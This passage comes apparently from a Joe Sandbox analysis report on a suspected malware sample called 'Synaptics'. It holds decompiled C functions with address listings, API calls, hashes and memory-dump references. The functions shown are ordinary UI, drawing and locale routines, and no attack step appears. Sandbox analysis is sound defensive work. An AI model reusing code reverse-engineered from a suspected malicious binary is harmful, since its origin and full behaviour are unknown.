					 *(_t118 + 0x94) = MulDiv( *(_t118 + 0x94), _t117,  *_t121);
				}
				if( *((char*)(_t118 + 0x59)) == 0 && (_t107 & 0x00000010) != 0) {
					E004250B0( *((intOrPtr*)(_t118 + 0x68)), MulDiv(E00425094( *((intOrPtr*)(_t118 + 0x68))), _t117,  *_t121));
				}
				goto L29;
			}













                                                                                                                                                                                          0x0043ab9f
                                                                                                                                                                                          0x0043aba2
                                                                                                                                                                                          0x0043aba4
                                                                                                                                                                                          0x0043aba9
                                                                                                                                                                                          0x0043ad26
                                                                                                                                                                                          0x0043ad26
                                                                                                                                                                                          0x0043ad2b
                                                                                                                                                                                          0x0043ad38
                                                                                                                                                                                          0x0043ad38
                                                                                                                                                                                          0x0043abb3
                                                                                                                                                                                          0x0043abbd
                                                                                                                                                                                          0x0043abb5
                                                                                                                                                                                          0x0043abb5
                                                                                                                                                                                          0x0043abb5
                                                                                                                                                                                          0x0043abc6
                                                                                                                                                                                          0x0043abda
                                                                                                                                                                                          0x0043abc8
                                                                                                                                                                                          0x0043abd6
                                                                                                                                                                                          0x0043abd6
                                                                                                                                                                                          0x0043abe0
                                                                                                                                                                                          0x0043abf9
                                                                                                                                                                                          0x0043abe2
                                                                                                                                                                                          0x0043abf0
                                                                                                                                                                                          0x0043abf0
                                                                                                                                                                                          0x0043ac00
                                                                                                                                                                                          0x0043ac3a
                                                                                                                                                                                          0x0043ac3d
                                                                                                                                                                                          0x0043ac08
                                                                                                                                                                                          0x0043ac0b
                                                                                                                                                                                          0x0043ac2f
                                                                                                                                                                                          0x0043ac34
                                                                                                                                                                                          0x0043ac0d
                                                                                                                                                                                          0x0043ac1e
                                                                                                                                                                                          0x0043ac20
                                                                                                                                                                                          0x0043ac20
                                                                                                                                                                                          0x0043ac0b
                                                                                                                                                                                          0x0043ac44
                                                                                                                                                                                          0x0043ac49
                                                                                                                                                                                          0x0043ac8d
                                                                                                                                                                                          0x0043ac51
                                                                                                                                                                                          0x0043ac59
                                                                                                                                                                                          0x0043ac84
                                                                                                                                                                                          0x0043ac5b
                                                                                                                                                                                          0x0043ac70
                                                                                                                                                                                          0x0043ac70
                                                                                                                                                                                          0x0043ac59
                                                                                                                                                                                          0x0043aca5
                                                                                                                                                                                          0x0043acb3
                                                                                                                                                                                          0x0043acbb
                                                                                                                                                                                          0x0043acce
                                                                                                                                                                                          0x0043acce
                                                                                                                                                                                          0x0043acdc
                                                                                                                                                                                          0x0043ace4
                                                                                                                                                                                          0x0043acf7
                                                                                                                                                                                          0x0043acf7
                                                                                                                                                                                          0x0043ad01
                                                                                                                                                                                          0x0043ad21
                                                                                                                                                                                          0x0043ad21
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • MulDiv.KERNEL32(?,?,?), ref: 0043ABD1
                                                                                                                                                                                          • MulDiv.KERNEL32(?,?,?), ref: 0043ABEB
                                                                                                                                                                                          • MulDiv.KERNEL32(?,?,?), ref: 0043AC19
                                                                                                                                                                                          • MulDiv.KERNEL32(?,?,?), ref: 0043AC2F
                                                                                                                                                                                          • MulDiv.KERNEL32(?,?,?), ref: 0043AC67
                                                                                                                                                                                          • MulDiv.KERNEL32(?,?,?), ref: 0043AC7F
                                                                                                                                                                                          • MulDiv.KERNEL32(?,?,0000001F), ref: 0043ACC9
                                                                                                                                                                                          • MulDiv.KERNEL32(?,?,0000001F), ref: 0043ACF2
                                                                                                                                                                                          • MulDiv.KERNEL32(00000000,?,0000001F), ref: 0043AD18
                                                                                                                                                                                            • Part of subcall function 004250B0: MulDiv.KERNEL32(00000000,?,00000048), ref: 004250BD
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 74bc730eb7918a069ca069f08e5092c7babda7016c5e1a77fecd0a99066e1a0c
                                                                                                                                                                                          • Instruction ID: d10f16ddfd9cc23340e03066ebc6cedff9c8bd4490aae9a17c26e6f9981b1e60
                                                                                                                                                                                          • Opcode Fuzzy Hash: 74bc730eb7918a069ca069f08e5092c7babda7016c5e1a77fecd0a99066e1a0c
                                                                                                                                                                                          • Instruction Fuzzy Hash: C6518E70648744AFC320DB29C841B6BB7E9AF59304F04A81EB9D5C7792C63DEC508B1A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0043BA38 Relevance: 13.6, APIs: 9, Instructions: 122windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 37%
                                                                                                                                                                                          			E0043BA38(void* __ebx, char __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				char _v5;
				struct HDC__* _v12;
				struct HDC__* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				int _v32;
				int _v36;
				struct HDC__* _t33;
				intOrPtr _t72;
				int _t74;
				intOrPtr _t80;
				int _t83;
				void* _t88;
				int _t89;
				void* _t92;
				void* _t93;
				intOrPtr _t94;

				_t92 = _t93;
				_t94 = _t93 + 0xffffffe0;
				_v5 = __ecx;
				_t74 =  *((intOrPtr*)( *__edx + 0x38))();
				if(_v5 == 0) {
					_push(__edx);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_pop(_t88);
				} else {
					_push(__edx);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_pop(_t88);
				}
				_v12 = GetDesktopWindow();
				_push(0x402);
				_push(0);
				_t33 = _v12;
				_push(_t33);
				L00407640();
				_v16 = _t33;
				_push(_t92);
				_push(0x43bb53);
				_push( *[fs:eax]);
				 *[fs:eax] = _t94;
				_v20 = SelectObject(_v16, E00425610( *((intOrPtr*)(_t88 + 0x40))));
				_t89 = _v36;
				_t83 = _v32;
				PatBlt(_v16, _t89 + _t74, _t83, _v28 - _t89 - _t74, _t74, 0x5a0049);
				PatBlt(_v16, _v28 - _t74, _t83 + _t74, _t74, _v24 - _t83 - _t74, 0x5a0049);
				PatBlt(_v16, _t89, _v24 - _t74, _v28 - _v36 - _t74, _t74, 0x5a0049);
				PatBlt(_v16, _t89, _t83, _t74, _v24 - _v32 - _t74, 0x5a0049);
				SelectObject(_v16, _v20);
				_pop(_t80);
				 *[fs:eax] = _t80;
				_push(0x43bb5a);
				_push(_v16);
				_t72 = _v12;
				_push(_t72);
				L00407888();
				return _t72;
			}





















                                                                                                                                                                                          0x0043ba39
                                                                                                                                                                                          0x0043ba3b
                                                                                                                                                                                          0x0043ba41
                                                                                                                                                                                          0x0043ba4d
                                                                                                                                                                                          0x0043ba53
                                                                                                                                                                                          0x0043ba63
                                                                                                                                                                                          0x0043ba6a
                                                                                                                                                                                          0x0043ba6b
                                                                                                                                                                                          0x0043ba6c
                                                                                                                                                                                          0x0043ba6d
                                                                                                                                                                                          0x0043ba6e
                                                                                                                                                                                          0x0043ba55
                                                                                                                                                                                          0x0043ba55
                                                                                                                                                                                          0x0043ba5c
                                                                                                                                                                                          0x0043ba5d
                                                                                                                                                                                          0x0043ba5e
                                                                                                                                                                                          0x0043ba5f
                                                                                                                                                                                          0x0043ba60
                                                                                                                                                                                          0x0043ba60
                                                                                                                                                                                          0x0043ba74
                                                                                                                                                                                          0x0043ba77
                                                                                                                                                                                          0x0043ba7c
                                                                                                                                                                                          0x0043ba7e
                                                                                                                                                                                          0x0043ba81
                                                                                                                                                                                          0x0043ba82
                                                                                                                                                                                          0x0043ba87
                                                                                                                                                                                          0x0043ba8c
                                                                                                                                                                                          0x0043ba8d
                                                                                                                                                                                          0x0043ba92
                                                                                                                                                                                          0x0043ba95
                                                                                                                                                                                          0x0043baaa
                                                                                                                                                                                          0x0043bab6
                                                                                                                                                                                          0x0043babe
                                                                                                                                                                                          0x0043bacb
                                                                                                                                                                                          0x0043baed
                                                                                                                                                                                          0x0043bb0c
                                                                                                                                                                                          0x0043bb26
                                                                                                                                                                                          0x0043bb33
                                                                                                                                                                                          0x0043bb3a
                                                                                                                                                                                          0x0043bb3d
                                                                                                                                                                                          0x0043bb40
                                                                                                                                                                                          0x0043bb48
                                                                                                                                                                                          0x0043bb49
                                                                                                                                                                                          0x0043bb4c
                                                                                                                                                                                          0x0043bb4d
                                                                                                                                                                                          0x0043bb52

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 0043BA6F
                                                                                                                                                                                          • 73CCACE0.USER32(?,00000000,00000402), ref: 0043BA82
                                                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0043BAA5
                                                                                                                                                                                          • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0043BACB
                                                                                                                                                                                          • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0043BAED
                                                                                                                                                                                          • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0043BB0C
                                                                                                                                                                                          • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0043BB26
                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 0043BB33
                                                                                                                                                                                          • 73CCB380.USER32(?,?,0043BB5A,?,?,00000000,?,005A0049,?,?,?,?,00000000,005A0049,?,?), ref: 0043BB4D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ObjectSelect$B380DesktopWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 989747725-0
                                                                                                                                                                                          • Opcode ID: 7800c06a896ca1d7a820f99e0eaaeca953fcc8a13d6410e573648fdb49d8ff4f
                                                                                                                                                                                          • Instruction ID: e1e64ebeb7b5d23d6db400034beff9ba963c624bbe95d31bbb4f2864b739462b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7800c06a896ca1d7a820f99e0eaaeca953fcc8a13d6410e573648fdb49d8ff4f
                                                                                                                                                                                          • Instruction Fuzzy Hash: B7310AB6E04619AFDB01DEEDCC85EAFBBBCEF09704B408465B504F7241C679AD008BA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040E2E8 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                                                                          			E0040E2E8(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0x40e5b3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				E0040E174();
				E0040CA14(__ebx, __edi, __esi);
				_t196 =  *0x49e750;
				if( *0x49e750 != 0) {
					E0040CBEC(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E0040C964(_t43, 0, 0x14,  &_v20);
				E00404A14(0x49e684, _v20);
				E0040C964(_t43, 0x40e5c8, 0x1b,  &_v24);
				 *0x49e688 = E00409664(0x40e5c8, 0, _t196);
				E0040C964(_t132, 0x40e5c8, 0x1c,  &_v28);
				 *0x49e689 = E00409664(0x40e5c8, 0, _t196);
				 *0x49e68a = E0040C9B0(_t132, 0x2c, 0xf);
				 *0x49e68b = E0040C9B0(_t132, 0x2e, 0xe);
				E0040C964(_t132, 0x40e5c8, 0x19,  &_v32);
				 *0x49e68c = E00409664(0x40e5c8, 0, _t196);
				 *0x49e68d = E0040C9B0(_t132, 0x2f, 0x1d);
				E0040C964(_t132, "m/d/yy", 0x1f,  &_v40);
				E0040CC9C(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E00404A14(0x49e690, _v36);
				E0040C964(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E0040CC9C(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E00404A14(0x49e694, _v44);
				 *0x49e698 = E0040C9B0(_t132, 0x3a, 0x1e);
				E0040C964(_t132, 0x40e5fc, 0x28,  &_v52);
				E00404A14(0x49e69c, _v52);
				E0040C964(_t132, 0x40e608, 0x29,  &_v56);
				E00404A14(0x49e6a0, _v56);
				E004049C0( &_v12);
				E004049C0( &_v16);
				E0040C964(_t132, 0x40e5c8, 0x25,  &_v60);
				_t104 = E00409664(0x40e5c8, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E00404A58( &_v8, 0x40e620);
				} else {
					E00404A58( &_v8, 0x40e614);
				}
				E0040C964(_t132, 0x40e5c8, 0x23,  &_v64);
				_t111 = E00409664(0x40e5c8, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E0040C964(_t132, 0x40e5c8, 0x1005,  &_v68);
					if(E00409664(0x40e5c8, 0, _t198) != 0) {
						E00404A58( &_v12, 0x40e63c);
					} else {
						E00404A58( &_v16, 0x40e62c);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E00404D40();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E00404D40();
				 *0x49e752 = E0040C9B0(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(E0040E5BA);
				return E004049E4( &_v68, 0x10);
			}

























                                                                                                                                                                                          0x0040e2e8
                                                                                                                                                                                          0x0040e2e8
                                                                                                                                                                                          0x0040e2e9
                                                                                                                                                                                          0x0040e2eb
                                                                                                                                                                                          0x0040e2f0
                                                                                                                                                                                          0x0040e2f0
                                                                                                                                                                                          0x0040e2f2
                                                                                                                                                                                          0x0040e2f4
                                                                                                                                                                                          0x0040e2f4
                                                                                                                                                                                          0x0040e2f7
                                                                                                                                                                                          0x0040e2fa
                                                                                                                                                                                          0x0040e2fb
                                                                                                                                                                                          0x0040e300
                                                                                                                                                                                          0x0040e303
                                                                                                                                                                                          0x0040e306
                                                                                                                                                                                          0x0040e30b
                                                                                                                                                                                          0x0040e310
                                                                                                                                                                                          0x0040e317
                                                                                                                                                                                          0x0040e319
                                                                                                                                                                                          0x0040e319
                                                                                                                                                                                          0x0040e323
                                                                                                                                                                                          0x0040e332
                                                                                                                                                                                          0x0040e33f
                                                                                                                                                                                          0x0040e354
                                                                                                                                                                                          0x0040e363
                                                                                                                                                                                          0x0040e378
                                                                                                                                                                                          0x0040e387
                                                                                                                                                                                          0x0040e39a
                                                                                                                                                                                          0x0040e3ad
                                                                                                                                                                                          0x0040e3c2
                                                                                                                                                                                          0x0040e3d1
                                                                                                                                                                                          0x0040e3e4
                                                                                                                                                                                          0x0040e3f9
                                                                                                                                                                                          0x0040e404
                                                                                                                                                                                          0x0040e411
                                                                                                                                                                                          0x0040e426
                                                                                                                                                                                          0x0040e431
                                                                                                                                                                                          0x0040e43e
                                                                                                                                                                                          0x0040e451
                                                                                                                                                                                          0x0040e466
                                                                                                                                                                                          0x0040e473
                                                                                                                                                                                          0x0040e488
                                                                                                                                                                                          0x0040e495
                                                                                                                                                                                          0x0040e49d
                                                                                                                                                                                          0x0040e4a5
                                                                                                                                                                                          0x0040e4ba
                                                                                                                                                                                          0x0040e4c4
                                                                                                                                                                                          0x0040e4c9
                                                                                                                                                                                          0x0040e4cb
                                                                                                                                                                                          0x0040e4e4
                                                                                                                                                                                          0x0040e4cd
                                                                                                                                                                                          0x0040e4d5
                                                                                                                                                                                          0x0040e4d5
                                                                                                                                                                                          0x0040e4f9
                                                                                                                                                                                          0x0040e503
                                                                                                                                                                                          0x0040e508
                                                                                                                                                                                          0x0040e50a
                                                                                                                                                                                          0x0040e51c
                                                                                                                                                                                          0x0040e52d
                                                                                                                                                                                          0x0040e546
                                                                                                                                                                                          0x0040e52f
                                                                                                                                                                                          0x0040e537
                                                                                                                                                                                          0x0040e537
                                                                                                                                                                                          0x0040e52d
                                                                                                                                                                                          0x0040e54b
                                                                                                                                                                                          0x0040e54e
                                                                                                                                                                                          0x0040e551
                                                                                                                                                                                          0x0040e556
                                                                                                                                                                                          0x0040e563
                                                                                                                                                                                          0x0040e568
                                                                                                                                                                                          0x0040e56b
                                                                                                                                                                                          0x0040e56e
                                                                                                                                                                                          0x0040e573
                                                                                                                                                                                          0x0040e580
                                                                                                                                                                                          0x0040e593
                                                                                                                                                                                          0x0040e59a
                                                                                                                                                                                          0x0040e59d
                                                                                                                                                                                          0x0040e5a0
                                                                                                                                                                                          0x0040e5b2

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000000,0040E5B3,?,?,00000000,00000000), ref: 0040E31E
                                                                                                                                                                                            • Part of subcall function 0040C964: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C982
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Locale$InfoThread
                                                                                                                                                                                          • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                                                                          • API String ID: 4232894706-2493093252
                                                                                                                                                                                          • Opcode ID: 7a4ec08d60e7301cad96d7fb6775c5cef7f2f9e679167df0a97288120caaca56
                                                                                                                                                                                          • Instruction ID: 2ac3dc33e66767ce4b71c968eb597fff0a4fdc25e0501dc74ddfc3eea00af484
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a4ec08d60e7301cad96d7fb6775c5cef7f2f9e679167df0a97288120caaca56
                                                                                                                                                                                          • Instruction Fuzzy Hash: 47612FB07002489BDB00EBF6D881A9E76A59B98704F50993BB100BB3C6DA3DDD15971D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004388F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 139threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                          			E004388F0(intOrPtr __eax, void* __ecx, intOrPtr _a4) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				struct HWND__* _v24;
				intOrPtr _v28;
				char _v32;
				struct tagRECT _v48;
				struct tagRECT _v64;
				struct HWND__* _t53;
				intOrPtr _t55;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t78;
				intOrPtr _t84;
				intOrPtr _t86;
				intOrPtr _t93;
				intOrPtr _t98;
				intOrPtr _t101;
				void* _t102;
				intOrPtr* _t104;
				intOrPtr _t106;
				intOrPtr _t110;
				intOrPtr _t112;
				struct HWND__* _t113;
				intOrPtr _t114;
				intOrPtr _t116;
				intOrPtr _t117;

				_t102 = __ecx;
				_t101 = __eax;
				_v5 = 1;
				_t113 = E00438D40(_a4 + 0xfffffff7);
				_v24 = _t113;
				_t53 = GetWindow(_t113, 4);
				_t104 =  *0x49dbcc; // 0x49ebb8
				_t4 =  *_t104 + 0x30; // 0x20398
				if(_t53 ==  *_t4) {
					L6:
					if(_v24 == 0) {
						L25:
						return _v5;
					}
					_t114 = _t101;
					while(1) {
						_t55 =  *((intOrPtr*)(_t114 + 0x30));
						if(_t55 == 0) {
							break;
						}
						_t114 = _t55;
					}
					_t112 = E00441704(_t114);
					_v28 = _t112;
					if(_t112 == _v24) {
						goto L25;
					}
					_t13 = _a4 - 0x10; // 0xe87d83e8
					_t60 =  *((intOrPtr*)( *_t13 + 0x30));
					if(_t60 == 0) {
						_t19 = _a4 - 0x10; // 0xe87d83e8
						_t106 =  *0x437498; // 0x4374e4
						__eflags = E00403D78( *_t19, _t106);
						if(__eflags == 0) {
							__eflags = 0;
							_v32 = 0;
						} else {
							_t21 = _a4 - 0x10; // 0xe87d83e8
							_v32 = E00441704( *_t21);
						}
						L19:
						_v12 = 0;
						_t65 = _a4;
						_v20 =  *((intOrPtr*)(_t65 - 9));
						_v16 =  *((intOrPtr*)(_t65 - 5));
						_push( &_v32);
						_push(E00438884);
						_push(GetCurrentThreadId());
						L004075C8();
						_t126 = _v12;
						if(_v12 == 0) {
							goto L25;
						}
						GetWindowRect(_v24,  &_v48);
						_push(_a4 + 0xfffffff7);
						_push(_a4 - 1);
						E00403DE8(_t101, _t126);
						_t78 =  *0x49eb38; // 0x0
						_t110 =  *0x4360a0; // 0x4360ec
						if(E00403D78(_t78, _t110) == 0) {
							L23:
							if(IntersectRect( &_v48,  &_v48,  &_v64) != 0) {
								_v5 = 0;
							}
							goto L25;
						}
						_t84 =  *0x49eb38; // 0x0
						if( *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x38)) + 0xa0)) == 0) {
							goto L23;
						}
						_t86 =  *0x49eb38; // 0x0
						if(E00441704( *((intOrPtr*)( *((intOrPtr*)(_t86 + 0x38)) + 0xa0))) == _v24) {
							goto L25;
						}
						goto L23;
					}
					_t116 = _t60;
					while(1) {
						_t93 =  *((intOrPtr*)(_t116 + 0x30));
						if(_t93 == 0) {
							break;
						}
						_t116 = _t93;
					}
					_v32 = E00441704(_t116);
					goto L19;
				}
				_t117 = E00437E5C(_v24, _t102);
				if(_t117 == 0) {
					goto L25;
				} else {
					while(1) {
						_t98 =  *((intOrPtr*)(_t117 + 0x30));
						if(_t98 == 0) {
							break;
						}
						_t117 = _t98;
					}
					_v24 = E00441704(_t117);
					goto L6;
				}
			}































                                                                                                                                                                                          0x004388f0
                                                                                                                                                                                          0x004388f9
                                                                                                                                                                                          0x004388fb
                                                                                                                                                                                          0x0043890a
                                                                                                                                                                                          0x0043890c
                                                                                                                                                                                          0x00438912
                                                                                                                                                                                          0x00438917
                                                                                                                                                                                          0x0043891f
                                                                                                                                                                                          0x00438922
                                                                                                                                                                                          0x0043894b
                                                                                                                                                                                          0x0043894f
                                                                                                                                                                                          0x00438a7e
                                                                                                                                                                                          0x00438a87
                                                                                                                                                                                          0x00438a87
                                                                                                                                                                                          0x00438955
                                                                                                                                                                                          0x0043895b
                                                                                                                                                                                          0x0043895b
                                                                                                                                                                                          0x00438960
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00438959
                                                                                                                                                                                          0x00438959
                                                                                                                                                                                          0x00438969
                                                                                                                                                                                          0x0043896b
                                                                                                                                                                                          0x00438971
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043897a
                                                                                                                                                                                          0x0043897d
                                                                                                                                                                                          0x00438982
                                                                                                                                                                                          0x004389a3
                                                                                                                                                                                          0x004389a6
                                                                                                                                                                                          0x004389b1
                                                                                                                                                                                          0x004389b3
                                                                                                                                                                                          0x004389c5
                                                                                                                                                                                          0x004389c7
                                                                                                                                                                                          0x004389b5
                                                                                                                                                                                          0x004389b8
                                                                                                                                                                                          0x004389c0
                                                                                                                                                                                          0x004389c0
                                                                                                                                                                                          0x004389ca
                                                                                                                                                                                          0x004389ca
                                                                                                                                                                                          0x004389ce
                                                                                                                                                                                          0x004389d4
                                                                                                                                                                                          0x004389da
                                                                                                                                                                                          0x004389e0
                                                                                                                                                                                          0x004389e1
                                                                                                                                                                                          0x004389eb
                                                                                                                                                                                          0x004389ec
                                                                                                                                                                                          0x004389f1
                                                                                                                                                                                          0x004389f5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00438a03
                                                                                                                                                                                          0x00438a0e
                                                                                                                                                                                          0x00438a13
                                                                                                                                                                                          0x00438a23
                                                                                                                                                                                          0x00438a28
                                                                                                                                                                                          0x00438a2d
                                                                                                                                                                                          0x00438a3a
                                                                                                                                                                                          0x00438a65
                                                                                                                                                                                          0x00438a78
                                                                                                                                                                                          0x00438a7a
                                                                                                                                                                                          0x00438a7a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00438a78
                                                                                                                                                                                          0x00438a3c
                                                                                                                                                                                          0x00438a4b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00438a4d
                                                                                                                                                                                          0x00438a63
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00438a63
                                                                                                                                                                                          0x00438987
                                                                                                                                                                                          0x0043898d
                                                                                                                                                                                          0x0043898d
                                                                                                                                                                                          0x00438992
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043898b
                                                                                                                                                                                          0x0043898b
                                                                                                                                                                                          0x0043899b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043899b
                                                                                                                                                                                          0x0043892c
                                                                                                                                                                                          0x00438930
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00438936
                                                                                                                                                                                          0x0043893a
                                                                                                                                                                                          0x0043893a
                                                                                                                                                                                          0x0043893f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00438938
                                                                                                                                                                                          0x00438938
                                                                                                                                                                                          0x00438948
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00438948

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00438D40: WindowFromPoint.USER32(00438B1A,0049EB5C,00000000,0043890A,?,-0000000C,?), ref: 00438D46
                                                                                                                                                                                            • Part of subcall function 00438D40: GetParent.USER32(00000000), ref: 00438D5D
                                                                                                                                                                                          • GetWindow.USER32(00000000,00000004), ref: 00438912
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 004389E6
                                                                                                                                                                                          • 73CCAC10.USER32(00000000,00438884,?,00000000,00000004,?,-0000000C,?), ref: 004389EC
                                                                                                                                                                                          • GetWindowRect.USER32 ref: 00438A03
                                                                                                                                                                                          • IntersectRect.USER32 ref: 00438A71
                                                                                                                                                                                            • Part of subcall function 00437E5C: GetWindowThreadProcessId.USER32(00000000), ref: 00437E69
                                                                                                                                                                                            • Part of subcall function 00437E5C: GetCurrentProcessId.KERNEL32(?,?,00000000,0045A3E7,?,?,0049ABD1,00000001,0045A553,?,?,?,0049ABD1), ref: 00437E72
                                                                                                                                                                                            • Part of subcall function 00437E5C: GlobalFindAtomA.KERNEL32(00000000), ref: 00437E87
                                                                                                                                                                                            • Part of subcall function 00437E5C: GetPropA.USER32 ref: 00437E9E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$CurrentProcessRectThread$AtomFindFromGlobalIntersectParentPointProp
                                                                                                                                                                                          • String ID: `C$tC
                                                                                                                                                                                          • API String ID: 2049660638-2788972245
